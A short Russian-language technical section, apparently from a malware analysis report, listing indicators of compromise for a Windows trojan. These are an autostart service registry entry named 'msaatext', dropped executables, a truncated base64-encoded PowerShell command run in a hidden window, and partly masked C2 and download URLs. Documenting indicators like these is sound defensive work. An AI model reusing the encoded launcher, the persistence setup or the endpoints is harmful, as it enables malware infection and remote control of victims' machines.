Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\msaatext] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msaatext] 'ImagePath' = '"<SYSTEM32>\CHxReadingStringIME\msaatext.exe"'
- 'msaatext' "<SYSTEM32>\CHxReadingStringIME\msaatext.exe"
- 'msaatext' <SYSTEM32>\CHxReadingStringIME\msaatext.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAHcAMABwAHYAaQBkAD0AKAAoACcAWgBfAGgAegAnACsAJwBjAGMAJwApACsAJwB1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVABlAG0AcABcAFcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\ylpocpu.exe
- <SYSTEM32>\chxreadingstringime\msaatext.exe
- %TEMP%\word\2019\ylpocpu.exe в <SYSTEM32>\chxreadingstringime\msaatext.exe
- '45.##.226.117':443
- http://ra####tisitma.com/wp-includes/nl/
- http://45.##.226.117:443/v8GKCVr362DX4x1/TjqRvlub/9lMDRRd/zA5o7UCyVXIJn1qOEb/lIRH0Z49t4J5U3h/67ZFpOCtsVyWN7sauj3/ via 45.##.226.117
- DNS ASK ra####tisitma.com
- '%TEMP%\word\2019\ylpocpu.exe'
- '<SYSTEM32>\chxreadingstringime\msaatext.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAHcAMABwAHYAaQBkAD0AKAAoACcAWgBfAGgAegAnACsAJwBjAGMAJwApACsAJwB1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVABlAG0AcABcAFcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)